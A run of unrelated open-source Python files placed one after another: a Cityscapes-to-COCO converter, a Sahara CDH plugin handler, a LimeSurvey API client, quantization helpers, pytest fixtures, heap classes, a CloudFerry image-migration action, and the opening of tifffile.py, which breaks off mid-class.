print("Num images: %s" % len(images)) with open(os.path.join(out_dir, json_name % data_set), 'wb') as outfile: outfile.write(json.dumps(ann_dict)) # for Cityscapes def getLabelID(self, instID): if (instID < 1000): return instID else: return int(instID / 1000) def convert_cityscapes_instance_only( data_dir, out_dir): """Convert from cityscapes format to COCO instance seg format - polygons""" sets = [ 'gtFine_val', # 'gtFine_train', # 'gtFine_test', # 'gtCoarse_train', # 'gtCoarse_val', # 'gtCoarse_train_extra' ] ann_dirs = [ 'gtFine_trainvaltest/gtFine/val', # 'gtFine_trainvaltest/gtFine/train', # 'gtFine_trainvaltest/gtFine/test', # 'gtCoarse/train', # 'gtCoarse/train_extra', # 'gtCoarse/val' ] json_name = 'instancesonly_filtered_%s.json' ends_in = '%s_polygons.json' img_id = 0 ann_id = 0 cat_id = 1 category_dict = {} category_instancesonly = [ 'person', 'rider', 'car', 'truck', 'bus', 'train', 'motorcycle', 'bicycle', ] for data_set, ann_dir in zip(sets, ann_dirs): print('Starting %s' % data_set) ann_dict = {} images = [] annotations = [] ann_dir = os.path.join(data_dir, ann_dir) for root, _, files in os.walk(ann_dir): for filename in files: if filename.endswith(ends_in % data_set.split('_')[0]): if len(images) % 50 == 0: print("Processed %s images, %s annotations" % ( len(images), len(annotations))) json_ann = json.load(open(os.path.join(root, filename))) image = {} image['id'] = img_id img_id += 1 image['width'] = json_ann['imgWidth'] image['height'] = json_ann['imgHeight'] image['file_name'] = filename[:-len( ends_in % data_set.split('_')[0])] + 'leftImg8bit.png' image['seg_file_name'] = filename[:-len( ends_in % data_set.split('_')[0])] + \ '%s_instanceIds.png' % data_set.split('_')[0] images.append(image) fullname = os.path.join(root, image['seg_file_name']) objects = cs.instances2dict_with_polygons( [fullname], verbose=False)[fullname] for object_cls in objects: if object_cls not in category_instancesonly: continue # skip non-instance categories for obj in objects[object_cls]: if obj['contours'] == []: print('Warning: empty contours.') continue # skip non-instance categories len_p = [len(p) for p in obj['contours']] if min(len_p) <= 4: print('Warning: invalid contours.') continue # skip non-instance categories ann = {} ann['id'] = ann_id ann_id += 1 ann['image_id'] = image['id'] ann['segmentation'] = obj['contours'] if object_cls not in category_dict: category_dict[object_cls] = cat_id cat_id += 1 ann['category_id'] = category_dict[object_cls] ann['iscrowd'] = 0 ann['area'] = obj['pixelCount'] ann['bbox'] = bboxs_util.xyxy_to_xywh( segms_util.polys_to_boxes( [ann['segmentation']])).tolist()[0] annotations.append(ann) ann_dict['images'] = images categories = [{"id": category_dict[name], "name": name} for name in category_dict] ann_dict['categories'] = categories ann_dict['annotations'] = annotations print("Num categories: %s" % len(categories)) print("Num images: %s" % len(images)) print("Num annotations: %s" % len(annotations)) with open(os.path.join(out_dir, json_name % data_set), 'wb') as outfile: outfile.write(json.dumps(ann_dict)) if __name__ == '__main__': args = parse_args() if args.dataset == "cityscapes_instance_only": convert_cityscapes_instance_only(args.datadir, args.outdir) elif args.dataset == "cocostuff": convert_coco_stuff_mat(args.datadir, args.outdir) else: print("Dataset not supported: %s" % args.dataset)
# Copyright (c) 2015 Intel Corporation # Copyright (c) 2015 ISPRAS # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. from sahara.plugins.cdh import abstractversionhandler as avm from sahara.plugins.cdh.v5_4_0 import cloudera_utils from sahara.plugins.cdh.v5_4_0 import config_helper from sahara.plugins.cdh.v5_4_0 import deploy from sahara.plugins.cdh.v5_4_0 import edp_engine from sahara.plugins.cdh.v5_4_0 import plugin_utils from sahara.plugins.cdh.v5_4_0 import validation class VersionHandler(avm.BaseVersionHandler): def __init__(self): super(VersionHandler, self).__init__() self.config_helper = config_helper.ConfigHelperV540() self.cloudera_utils = cloudera_utils.ClouderaUtilsV540() self.plugin_utils = plugin_utils.PluginUtilsV540() self.deploy = deploy self.edp_engine = edp_engine self.validation = validation.ValidatorV540() def get_node_processes(self): return { "CLOUDERA": ['CLOUDERA_MANAGER'], "HDFS": ['HDFS_NAMENODE', 'HDFS_DATANODE', 'HDFS_SECONDARYNAMENODE', 'HDFS_JOURNALNODE'], "YARN": ['YARN_RESOURCEMANAGER', 'YARN_NODEMANAGER', 'YARN_JOBHISTORY', 'YARN_STANDBYRM'], "OOZIE": ['OOZIE_SERVER'], "HIVE": ['HIVE_SERVER2', 'HIVE_METASTORE', 'HIVE_WEBHCAT'], "HUE": ['HUE_SERVER'], "SPARK_ON_YARN": ['SPARK_YARN_HISTORY_SERVER'], "ZOOKEEPER": ['ZOOKEEPER_SERVER'], "HBASE": ['HBASE_MASTER', 'HBASE_REGIONSERVER'], "FLUME": ['FLUME_AGENT'], "IMPALA": ['IMPALA_CATALOGSERVER', 'IMPALA_STATESTORE', 'IMPALAD'], "KS_INDEXER": ['KEY_VALUE_STORE_INDEXER'], "SOLR": ['SOLR_SERVER'], "SQOOP": ['SQOOP_SERVER'], "SENTRY": ['SENTRY_SERVER'], "KMS": ['KMS'], "YARN_GATEWAY": [], "RESOURCEMANAGER": [], "NODEMANAGER": [], "JOBHISTORY": [], "HDFS_GATEWAY": [], 'DATANODE': [], 'NAMENODE': [], 'SECONDARYNAMENODE': [], 'JOURNALNODE': [], 'REGIONSERVER': [], 'MASTER': [], 'HIVEMETASTORE': [], 'HIVESERVER': [], 'WEBCAT': [], 'CATALOGSERVER': [], 'STATESTORE': [], 'IMPALAD': [], } def get_edp_engine(self, cluster, job_type): oozie_type = self.edp_engine.EdpOozieEngine.get_supported_job_types() spark_type = self.edp_engine.EdpSparkEngine.get_supported_job_types() if job_type in oozie_type: return self.edp_engine.EdpOozieEngine(cluster) if job_type in spark_type: return self.edp_engine.EdpSparkEngine(cluster) return None def get_edp_job_types(self): return (edp_engine.EdpOozieEngine.get_supported_job_types() + edp_engine.EdpSparkEngine.get_supported_job_types())
#!/usr/bin/env python # -*- coding: utf-8 -*- import requests import json from uuid import uuid4 headers = {'content-type': 'application/json'} def set_params(method, params): """Set params to query limesurvey""" data = {'method': method, 'params': params, 'id': str(uuid4())} return json.dumps(data) def get_session_key(limedict): """This function receive a dictionary with connection parameters. { "url": "full path for remote control", "username: "account name to be used" "password" "password for account"}""" url = limedict['url'] user = limedict['username'] password = limedict['password'] params = {'username': user, 'password': password} data = set_params('get_session_key', params) req = requests.post(url, data=data, headers=headers) return {'token': req.json()['result'], 'user': user, 'url': url} def list_surveys(session): """retrieve a list of surveys from current user""" params = {'sUser': session['user'], 'sSessionKey': session['token']} data = set_params('list_surveys', params) req = requests.post(session['url'], data=data, headers=headers) return req.text
import numpy as np # 8bitの最大値 QUANTIZE_BIT = 8 MAX_VALUE = (2 ** QUANTIZE_BIT )- 1 def deQuantize_scalar(x, min, max): """量子化を元に戻す""" gain = (max - min) / MAX_VALUE return x * gain + min def deQuantize(arr, a_min, a_max): """量子化を元に戻す""" gain = (a_max - a_min) / MAX_VALUE return arr * gain + a_min def Quantize(arr, min, max): """量子化を行う""" range = (max - min) range_scale = range / MAX_VALUE return ((arr - min) / range_scale).astype(np.int) def reQuantize(arr, q_min, q_max, new_min, new_max): mid = (q_max + q_min) / 2 gain = MAX_VALUE / (q_max - q_min) # start vector c_qt = (arr - mid) * gain + (MAX_VALUE / 2) return c_qt.astype(np.int) def q_inv(a_qt, a_min, a_max): """符号反転""" return MAX_VALUE - a_qt, - a_max, - a_min def q_add(a_qt, a_min, a_max, b_qt, b_min, b_max, debug=False): """加算""" gain = (b_max - b_min) / (a_max - a_min) min = a_min + b_min max = a_max + b_max q_param = (a_max - a_min) / (max - min) # debug if debug: print("gain = %f(%x), q_param = %f(%x)" % (gain, int(gain * (2 ** 8)), q_param, int(q_param * (2 ** 8)))) # start vector c_qt = b_qt * gain + a_qt c_qt *= q_param return c_qt.astype(np.int), min, max def q_mul(a_qt, a_min, a_max, b_qt, b_min, b_max, debug=False): """乗算""" Adash_max = a_max - a_min Adash_min = 0.0 Bdash_max = b_max - b_min Bdash_min = 0.0 # constant mul if b_min < 0: # 符号反転 qt_A_bmin, A_bmin_min_inv, A_bmin_max_inv = q_inv(a_qt, a_min, a_max) # 定数倍 A_bmin_min = A_bmin_min_inv * -b_min A_bmin_max = A_bmin_max_inv * -b_min if debug: print("SEL A INV") else: A_bmin_max = a_max * b_min A_bmin_min = a_min * b_min qt_A_bmin = a_qt if a_min < 0: qt_B_amin, B_amin_min_inv, B_amin_max_inv = q_inv(b_qt, b_min, b_max) B_amin_max = B_amin_max_inv * -a_min B_amin_min = B_amin_min_inv * -a_min if debug: print("SEL B INV") else: B_amin_max = b_max * a_min B_amin_min = b_min * a_min qt_B_amin = b_qt # vector AdBd_qt, AdBd_min, AdBd_max = q_mul_core(a_qt, Adash_min, Adash_max, b_qt, Bdash_min, Bdash_max, debug=debug) C_qt_0, C_qt_0_min, C_qt_0_max = q_add(qt_A_bmin, A_bmin_min, A_bmin_max, qt_B_amin, B_amin_min, B_amin_max, debug=debug) C_qt, c_min, c_max = q_add(AdBd_qt, AdBd_min, AdBd_max, C_qt_0, C_qt_0_min, C_qt_0_max, debug=debug) if debug: np.savetxt("AdBd_qt.txt", AdBd_qt, fmt="%d") np.savetxt("qt_A_bmin.txt", qt_A_bmin, fmt="%d") np.savetxt("qt_B_amin.txt", qt_B_amin, fmt="%d") np.savetxt("C_qt_0.txt", C_qt_0, fmt="%d") np.savetxt("C_qt.txt", C_qt, fmt="%d") f1 = a_min * b_min c_max_f = c_max - f1 c_min_f = c_min - f1 return C_qt.astype(np.int), c_min_f, c_max_f def q_mul_core(a_qt, a_min, a_max, b_qt, b_min, b_max, debug=False): """乗算""" gain_a = (a_max - a_min) / MAX_VALUE gain_b = (b_max - b_min) / MAX_VALUE min = a_min * b_min max = a_max * b_max q_param = MAX_VALUE / (max - min) p_gagb = gain_a * gain_b * q_param p_gaob = gain_a * b_min * q_param p_gboa = gain_b * a_min * q_param if debug: print("p_gagb = %f(%d), p_gaob = %f(%d), p_gboa = %f(%d)" % (p_gagb, int(p_gagb * (2 ** 16)), p_gaob, int(p_gaob * (2 ** 8)), p_gboa, int(p_gboa * (2 ** 8)))) # start vector alu AB = (p_gagb * a_qt * b_qt).astype(np.int) c_qt = AB # gaob_A = (a_qt * p_gaob).astype(np.int) # gboa_B = (b_qt * p_gboa).astype(np.int) # c_qt = AB + gaob_A + gboa_B return c_qt.astype(np.int), min, max
# -*- encoding: utf-8 -*- """Fixtures that are of general use.""" from __future__ import unicode_literals import datetime import faker as faker_ import pytest from hamster_lib.lib import HamsterControl from hamster_lib.storage import BaseStore from pytest_factoryboy import register from . import factories register(factories.CategoryFactory) register(factories.ActivityFactory) register(factories.TagFactory) register(factories.FactFactory) faker = faker_.Faker() def convert_time_to_datetime(time_string): """ Helper method. If given a %H:%M string, return a datetime.datetime object with todays date. """ return datetime.datetime.combine( datetime.datetime.now().date(), datetime.datetime.strptime(time_string, "%H:%M").time() ) # Controller @pytest.yield_fixture def controller(base_config): """Provide a basic controller.""" # [TODO] Parametrize over all available stores. controller = HamsterControl(base_config) yield controller controller.store.cleanup() @pytest.fixture def basestore(base_config): """Provide a generic ``storage.BaseStore`` instance using ``baseconfig``.""" store = BaseStore(base_config) return store # Categories @pytest.fixture(params=(None, True,)) def category_valid_parametrized(request, category_factory, name_string_valid_parametrized): """Provide a variety of valid category fixtures.""" if request.param: result = category_factory(name=name_string_valid_parametrized) else: result = None return result @pytest.fixture def category_valid_parametrized_without_none(request, category_factory, name_string_valid_parametrized): """ Provide a parametrized category fixture but not ``None``. This fixuture will represent a wide array of potential name charsets as well but not ``category=None``. """ return category_factory(name=name_string_valid_parametrized) # Activities @pytest.fixture def activity_valid_parametrized(request, activity_factory, name_string_valid_parametrized, category_valid_parametrized, deleted_valid_parametrized): """Provide a huge array of possible activity versions. Including None.""" return activity_factory(name=name_string_valid_parametrized, category=category_valid_parametrized, deleted=deleted_valid_parametrized) @pytest.fixture def new_activity_values(category): """Return garanteed modified values for a given activity.""" def modify(activity): return { 'name': activity.name + 'foobar', } return modify # Facts @pytest.fixture def fact_factory(): """Return a factory class that generates non-persisting Fact instances.""" return factories.FactFactory.build @pytest.fixture def fact(): """Provide a randomized non-persistant Fact-instance.""" return factories.FactFactory.build() @pytest.fixture def list_of_facts(fact_factory): """ Provide a factory that returns a list with given amount of Fact instances. The key point here is that these fact *do not overlap*! """ def get_list_of_facts(number_of_facts): facts = [] old_start = datetime.datetime.now() offset = datetime.timedelta(hours=4) for i in range(number_of_facts): start = old_start + offset facts.append(fact_factory(start=start)) old_start = start return facts return get_list_of_facts @pytest.fixture(params=('%M', '%H:%M')) def string_delta_format_parametrized(request): """Provide all possible format option for ``Fact().get_string_delta()``.""" return request.param @pytest.fixture def today_fact(fact_factory): """Return a ``Fact`` instance that start and ends 'today'.""" start = datetime.datetime.now() end = start + datetime.timedelta(minutes=30) return fact_factory(start=start, end=end) @pytest.fixture def not_today_fact(fact_factory): """Return a ``Fact`` instance that neither start nor ends 'today'.""" start = datetime.datetime.now() - datetime.timedelta(days=2) end = start + datetime.timedelta(minutes=30) return fact_factory(start=start, end=end) @pytest.fixture def current_fact(fact_factory): """Provide a ``ongoing fact``. That is a fact that has started but not ended yet.""" return fact_factory(start=datetime.datetime.now(), end=None) @pytest.fixture(params=[ '12:00 - 14:00 foo@bar, rumpelratz', '12:00 - 14:00 foo', 'foo@bar', # For the following there should not be successful start/end parsing but # instead just one big "activity.name, but it still constitutes a formally # valid fact. If we want to be more accurate we need to work with clear # expectations. '12:00-14:00 foo@bar', ]) def valid_raw_fact_parametrized(request): """Return various invalid ``raw fact`` strings.""" return request.param @pytest.fixture(params=[ '', '14:00 - 12:00 foo@bar', '12:00 - 14:00 @bar', ]) def invalid_raw_fact_parametrized(request): """Return various invalid ``raw fact`` strings.""" return request.param @pytest.fixture def raw_fact_with_persistent_activity(persistent_activity): """A raw fact whichs 'activity' is already present in the db.""" return ( '12:00-14:14 {a.name}@{a.category.name}'.format(a=persistent_activity), { 'start': convert_time_to_datetime('12:00'), 'end': convert_time_to_datetime('14:14'), 'activity': persistent_activity.name, 'category': persistent_activity.category.name, 'description': None, }, )
# Implementation of min and max heap data structures # By: Jacob Rockland # implementation of heap sort returning list in accending order, O(n*log(n)) def heap_sort_accending(items): heap = MinHeap(items) sorted = [heap.extract_min() for i in range(heap.size)] return sorted # implementation of heap sort returning list in decending order, O(n*log(n)) def heap_sort_decending(items): heap = MaxHeap(items) sorted = [heap.extract_max() for i in range(heap.size)] return sorted # implementation of min-heap class MinHeap(object): # initialize heap def __init__(self, items = None): if items is None: self.heap_list = [None] self.size = 0 else: self.build_heap(items) # returns string representation of heap def __repr__(self): temp = self.heap_list[1:] return repr(temp) # builds a heap from a given list of items, O(n) def build_heap(self, items): index = len(items) // 2 self.size = len(items) self.heap_list = [None] + items[:] while index > 0: self.percolate_down(index) index -= 1 # returns minimum item in heap, O(1) def get_min(self): if self.size > 0: return self.heap_list[1] else: return None # inserts a data item into the tree, O(log(n)) def insert(self, data): self.heap_list.append(data) self.size += 1 self.percolate_up(self.size) # percolates item in heap list upwards def percolate_up(self, index): # percolates upwards so long as current node is smaller than parent while index // 2 > 0: if self.heap_list[index] < self.heap_list[index // 2]: temp = self.heap_list[index // 2] self.heap_list[index // 2] = self.heap_list[index] self.heap_list[index] = temp index = index // 2 # extract the minimum item in heap, O(log(n)) def extract_min(self): if self.size > 0: min_val = self.heap_list[1] self.heap_list[1] = self.heap_list[self.size] self.size -= 1 self.heap_list.pop() self.percolate_down(1) return min_val else: return None # percolates item in heap list downwards def percolate_down(self, index): # percolates downwards so long as current node is greater than child while index * 2 <= self.size: min = self.min_child(index) if self.heap_list[index] > self.heap_list[min]: temp = self.heap_list[index] self.heap_list[index] = self.heap_list[min] self.heap_list[min] = temp index = min # returns index of smallest child of subtree def min_child(self, index): if index * 2 + 1 > self.size: return index * 2 elif self.heap_list[index * 2] < self.heap_list[index * 2 + 1]: return index * 2 else: return index * 2 + 1 # implementation of max-heap class MaxHeap(object): # initialize heap def __init__(self, items = None): if items is None: self.heap_list = [None] self.size = 0 else: self.build_heap(items) # returns string representation of heap def __repr__(self): temp = self.heap_list[1:] return repr(temp) # builds a heap from a given list of items, O(n) def build_heap(self, items): index = len(items) // 2 self.size = len(items) self.heap_list = [None] + items[:] while index > 0: self.percolate_down(index) index -= 1 # returns maximum item in heap, O(1) def get_max(self): if self.size > 0: return self.heap_list[1] else: return None # inserts a data item into the tree, O(log(n)) def insert(self, data): self.heap_list.append(data) self.size += 1 self.percolate_up(self.size) # percolates item in heap list upwards def percolate_up(self, index): # percolates upwards so long as current node is greater than parent while index // 2 > 0: if self.heap_list[index] > self.heap_list[index // 2]: temp = self.heap_list[index // 2] self.heap_list[index // 2] = self.heap_list[index] self.heap_list[index] = temp index = index // 2 # exctract the maximum item in heap, O(log(n)) def extract_max(self): if self.size > 0: max_val = self.heap_list[1] self.heap_list[1] = self.heap_list[self.size] self.size -= 1 self.heap_list.pop() self.percolate_down(1) return max_val else: return None # percolates item in heap list downwards def percolate_down(self, index): # percolates downwards so long as current node is smaller than child while index * 2 <= self.size: max = self.max_child(index) if self.heap_list[index] < self.heap_list[max]: temp = self.heap_list[index] self.heap_list[index] = self.heap_list[max] self.heap_list[max] = temp index = max # returns index of greatest child of subtree def max_child(self, index): if index * 2 + 1 > self.size: return index * 2 elif self.heap_list[index * 2] > self.heap_list[index * 2 + 1]: return index * 2 else: return index * 2 + 1
# Copyright (c) 2015 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an AS IS BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and# # limitations under the License. from cloudferrylib.base.action import action from cloudferrylib.utils import files from cloudferrylib.utils import remote_runner from cloudferrylib.utils.drivers.ssh_chunks import verified_file_copy, remote_md5_sum from cloudferrylib.utils import utils import copy import os LOG = utils.get_log(__name__) class ReCreateBootImage(action.Action): def __init__(self, init, cloud=None): super(ReCreateBootImage, self).__init__(init, cloud) self.src_user = self.cfg.src.ssh_user src_password = self.cfg.src.ssh_sudo_password self.src_host = self.cfg.src.ssh_host self.dst_user = self.cfg.dst.ssh_user dst_password = self.cfg.dst.ssh_sudo_password self.dst_host = self.cfg.dst.ssh_host self.src_runner = remote_runner.RemoteRunner(self.src_host, self.src_user, password=src_password, sudo=True) self.dst_runner = remote_runner.RemoteRunner(self.dst_host, self.dst_user, password=dst_password, sudo=True) def run(self, images_info=None, compute_ignored_images={}, missing_images={}, **kwargs): """ Create boot image on destination based on root disk of instance. Use diff&base images, commit all changes from diff to base, copy base and add as a glance image. Image ID from source is used as a name of new image because we can't get name of deleted image. :param images_info: dict with all images on source :param compute_ignored_images: not used, just resending to down level :param missing_images: dict with images that has been removed on source :param kwargs: not used :return: images_info and compute_ignored_images """ images_info = copy.deepcopy(images_info) for vm_id in missing_images: img_id = missing_images[vm_id] for image_id_src, gl_image in images_info['images'].iteritems(): if image_id_src == img_id and not gl_image['image']: diff = gl_image['meta']['instance'][0]['diff']['path_src'] img_src_host = gl_image['meta']['instance'][0]['diff']['host_src'] if img_src_host != self.src_host: LOG.warning('Different host information. ' + 'Image is located on host {img_src_host},' + 'but host in the configuration file {src_host}.'.format(img_src_host, self.src_host)) continue new_img = self.process_image(img_id, diff) gl_image['image']['id'] = new_img['id'] gl_image['image']['resource'] = None gl_image['image']['checksum'] = new_img['checksum'] gl_image['image']['name'] = img_id return { 'images_info': images_info, 'compute_ignored_images': compute_ignored_images} def process_image(self, img_id=None, diff=None): """ Processing image file: copy from source to destination, create glance image :param img_id: image ID from source :param diff: diff file of root disk for instance :return: new image ID if image is created """ with files.RemoteTempDir(self.src_runner) as src_tmp_dir,\ files.RemoteTempDir(self.dst_runner) as dst_tmp_dir: diff_name = 'diff' base_name = 'base' diff_file = os.path.join(src_tmp_dir, diff_name) self.src_runner.run('cp {} {}'.format(diff, diff_file)) base_file = os.path.join(src_tmp_dir, base_name) dst_base_file = os.path.join(dst_tmp_dir, base_name) qemu_img_src = self.src_cloud.qemu_img base = qemu_img_src.detect_backing_file(diff, self.src_host) if base is not None: self.src_runner.run('cp {} {}'.format(base, base_file)) qemu_img_src.diff_rebase(base_file, diff_file, self.src_host) qemu_img_src.diff_commit(src_tmp_dir, diff_name, self.src_host) verified_file_copy(self.src_runner, self.dst_runner, self.dst_user, base_file, dst_base_file, self.dst_host, 1) else: verified_file_copy(self.src_runner, self.dst_runner, self.dst_user, diff_file, dst_base_file, self.dst_host, 1) image_resource = self.dst_cloud.resources[utils.IMAGE_RESOURCE] id = image_resource.glance_img_create(self.dst_runner, img_id, 'qcow2', dst_base_file) checksum = remote_md5_sum(self.dst_runner, dst_base_file) return {'id': id, 'checksum': checksum}
#!/usr/bin/env python # -*- coding: utf-8 -*- # tifffile.py # Copyright (c) 2008-2014, Christoph Gohlke # Copyright (c) 2008-2014, The Regents of the University of California # Produced at the Laboratory for Fluorescence Dynamics # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the copyright holders nor the names of any # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """Read and write image data from and to TIFF files. Image and metadata can be read from TIFF, BigTIFF, OME-TIFF, STK, LSM, NIH, SGI, ImageJ, MicroManager, FluoView, SEQ and GEL files. Only a subset of the TIFF specification is supported, mainly uncompressed and losslessly compressed 2**(0 to 6) bit integer, 16, 32 and 64-bit float, grayscale and RGB(A) images, which are commonly used in bio-scientific imaging. Specifically, reading JPEG and CCITT compressed image data or EXIF, IPTC, GPS, and XMP metadata is not implemented. Only primary info records are read for STK, FluoView, MicroManager, and NIH image formats. TIFF, the Tagged Image File Format, is under the control of Adobe Systems. BigTIFF allows for files greater than 4 GB. STK, LSM, FluoView, SGI, SEQ, GEL, and OME-TIFF, are custom extensions defined by Molecular Devices (Universal Imaging Corporation), Carl Zeiss MicroImaging, Olympus, Silicon Graphics International, Media Cybernetics, Molecular Dynamics, and the Open Microscopy Environment consortium respectively. For command line usage run ``python tifffile.py --help`` :Author: `Christoph Gohlke <http://www.lfd.uci.edu/~gohlke/>`_ :Organization: Laboratory for Fluorescence Dynamics, University of California, Irvine :Version: 2014.08.24 Requirements ------------ * `CPython 2.7 or 3.4 <http://www.python.org>`_ * `Numpy 1.8.2 <http://www.numpy.org>`_ * `Matplotlib 1.4 <http://www.matplotlib.org>`_ (optional for plotting) * `Tifffile.c 2013.11.05 <http://www.lfd.uci.edu/~gohlke/>`_ (recommended for faster decoding of PackBits and LZW encoded strings) Notes ----- The API is not stable yet and might change between revisions. Tested on little-endian platforms only. Other Python packages and modules for reading bio-scientific TIFF files: * `Imread <http://luispedro.org/software/imread>`_ * `PyLibTiff <http://code.google.com/p/pylibtiff>`_ * `SimpleITK <http://www.simpleitk.org>`_ * `PyLSM <https://launchpad.net/pylsm>`_ * `PyMca.TiffIO.py <http://pymca.sourceforge.net/>`_ (same as fabio.TiffIO) * `BioImageXD.Readers <http://www.bioimagexd.net/>`_ * `Cellcognition.io <http://cellcognition.org/>`_ * `CellProfiler.bioformats <https://github.com/CellProfiler/python-bioformats>`_ Acknowledgements ---------------- * Egor Zindy, University of Manchester, for cz_lsm_scan_info specifics. * Wim Lewis for a bug fix and some read_cz_lsm functions. * Hadrien Mary for help on reading MicroManager files. References ---------- (1) TIFF 6.0 Specification and Supplements. Adobe Systems Incorporated. http://partners.adobe.com/public/developer/tiff/ (2) TIFF File Format FAQ. http://www.awaresystems.be/imaging/tiff/faq.html (3) MetaMorph Stack (STK) Image File Format. http://support.meta.moleculardevices.com/docs/t10243.pdf (4) Image File Format Description LSM 5/7 Release 6.0 (ZEN 2010). Carl Zeiss MicroImaging GmbH. BioSciences. May 10, 2011 (5) File Format Description - LSM 5xx Release 2.0. http://ibb.gsf.de/homepage/karsten.rodenacker/IDL/Lsmfile.doc (6) The OME-TIFF format. http://www.openmicroscopy.org/site/support/file-formats/ome-tiff (7) UltraQuant(r) Version 6.0 for Windows Start-Up Guide. http://www.ultralum.com/images%20ultralum/pdf/UQStart%20Up%20Guide.pdf (8) Micro-Manager File Formats. http://www.micro-manager.org/wiki/Micro-Manager_File_Formats (9) Tags for TIFF and Related Specifications. Digital Preservation. http://www.digitalpreservation.gov/formats/content/tiff_tags.shtml Examples -------- >>> data = numpy.random.rand(5, 301, 219) >>> imsave('temp.tif', data) >>> image = imread('temp.tif') >>> numpy.testing.assert_array_equal(image, data) >>> with TiffFile('temp.tif') as tif: ... images = tif.asarray() ... for page in tif: ... for tag in page.tags.values(): ... t = tag.name, tag.value ... image = page.asarray() """ from __future__ import division, print_function import sys import os import re import glob import math import zlib import time import json import struct import warnings import tempfile import datetime import collections from fractions import Fraction from xml.etree import cElementTree as etree import numpy # try: # import _tifffile # except ImportError: # warnings.warn( # "failed to import the optional _tifffile C extension module.\n" # "Loading of some compressed images will be slow.\n" # "Tifffile.c can be obtained at http://www.lfd.uci.edu/~gohlke/") __version__ = '2014.08.24' __docformat__ = 'restructuredtext en' __all__ = ('imsave', 'imread', 'imshow', 'TiffFile', 'TiffWriter', 'TiffSequence') def imsave(filename, data, **kwargs): """Write image data to TIFF file. Refer to the TiffWriter class and member functions for documentation. Parameters ---------- filename : str Name of file to write. data : array_like Input image. The last dimensions are assumed to be image depth, height, width, and samples. kwargs : dict Parameters 'byteorder', 'bigtiff', and 'software' are passed to the TiffWriter class. Parameters 'photometric', 'planarconfig', 'resolution', 'description', 'compress', 'volume', and 'extratags' are passed to the TiffWriter.save function. Examples -------- >>> data = numpy.random.rand(2, 5, 3, 301, 219) >>> description = u'{"shape": %s}' % str(list(data.shape)) >>> imsave('temp.tif', data, compress=6, ... extratags=[(270, 's', 0, description, True)]) """ tifargs = {} for key in ('byteorder', 'bigtiff', 'software', 'writeshape'): if key in kwargs: tifargs[key] = kwargs[key] del kwargs[key] if 'writeshape' not in kwargs: kwargs['writeshape'] = True if 'bigtiff' not in tifargs and data.size*data.dtype.itemsize > 2000*2**20: tifargs['bigtiff'] = True with TiffWriter(filename, **tifargs) as tif: tif.save(data, **kwargs) class TiffWriter(object): """Write image data to TIFF file. TiffWriter instances must be closed using the close method, which is automatically called when using the 'with' statement. Examples -------- >>> data = numpy.random.rand(2, 5, 3, 301, 219) >>> with TiffWriter('temp.tif', bigtiff=True) as tif: ... for i in range(data.shape[0]): ... tif.save(data[i], compress=6) """ TYPES = {'B': 1, 's': 2, 'H': 3, 'I': 4, '2I': 5, 'b': 6, 'h': 8, 'i': 9, 'f': 11, 'd': 12, 'Q': 16, 'q': 17} TAGS = { 'new_subfile_type': 254, 'subfile_type': 255, 'image_width': 256, 'image_length': 257, 'bits_per_sample': 258, 'compression': 259, 'photometric': 262, 'fill_order': 266, 'document_name': 269, 'image_description': 270, 'strip_offsets': 273, 'orientation': 274, 'samples_per_pixel': 277, 'rows_per_strip': 278, 'strip_byte_counts': 279, 'x_resolution': 282, 'y_resolution': 283, 'planar_configuration': 284, 'page_name': 285, 'resolution_unit': 296, 'software': 305, 'datetime': 306, 'predictor': 317, 'color_map': 320, 'tile_width': 322, 'tile_length': 323, 'tile_offsets': 324, 'tile_byte_counts': 325, 'extra_samples': 338, 'sample_format': 339, 'image_depth': 32997, 'tile_depth': 32998} def __init__(self, filename, bigtiff=False, byteorder=None, software='tifffile.py'): """Create a new TIFF file for writing. Use bigtiff=True when creating files greater than 2 GB. Parameters ---------- filename : str Name of file to write. bigtiff : bool If True, the BigTIFF format is used. byteorder : {'<', '>'} The endianness of the data in the file. By default this is the system's native byte order. software : str Name of the software used to create the image. Saved with the first page only. """ if byteorder not in (None, '<', '>'): raise ValueError("invalid byteorder %s" % byteorder) if byteorder is None: byteorder = '<' if sys.byteorder == 'little' else '>' self._byteorder = byteorder self._software = software self._fh = open(filename, 'wb') self._fh.write({'<': b'II', '>': b'MM'}[byteorder]) if bigtiff: self._bigtiff = True self._offset_size = 8 self._tag_size = 20 self._numtag_format = 'Q' self._offset_format = 'Q' self._val_format = '8s' self._fh.write(struct.pack(byteorder+'HHH', 43, 8, 0)) else: 